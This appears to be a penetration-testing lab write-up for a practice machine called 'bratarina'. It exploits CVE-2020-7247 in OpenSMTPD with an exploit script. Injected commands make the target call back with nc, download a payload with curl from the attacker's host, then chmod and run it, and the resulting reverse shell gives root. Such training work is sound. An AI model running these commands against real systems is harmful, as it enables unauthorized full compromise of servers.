CVE-2020-7247
The target SMTP server runs an outdated instance of OpenSMTPD, which is vulnerable to CVE-2020-7247
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ python3 CVE-2020-7247.py $IP 25 'nc 192.168.45.192 445'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] DoneTesting the outbound connection
/Practice/Bratarina/3-Exploitation/attachments/{4E0189BD-C9A1-4F64-A554-B4E838F8FD65}.png)
Got the connection back.
The OpenSMTPD instance is running with privileges of the root account
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ python3 CVE-2020-7247.py $IP 25 'curl 192.168.45.192/shell -o /tmp/shell'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done/Practice/Bratarina/3-Exploitation/attachments/{A8D8E92F-3E4E-4BA5-8F6C-DC299B4EE1B7}.png)
http:// appears to be truncated so I had to omit it
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ python3 CVE-2020-7247.py $IP 25 'chmod 755 /tmp/shell; /tmp/shell'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] DoneInvoking the reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ nnc 445
listening on [any] 445 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.132.71] 39134
whoami
root
hostname
bratarina
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:25:71 brd ff:ff:ff:ff:ff:ff
inet 192.168.132.71/24 brd 192.168.132.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the root account via exploiting CVE-2020-7247
System level compromise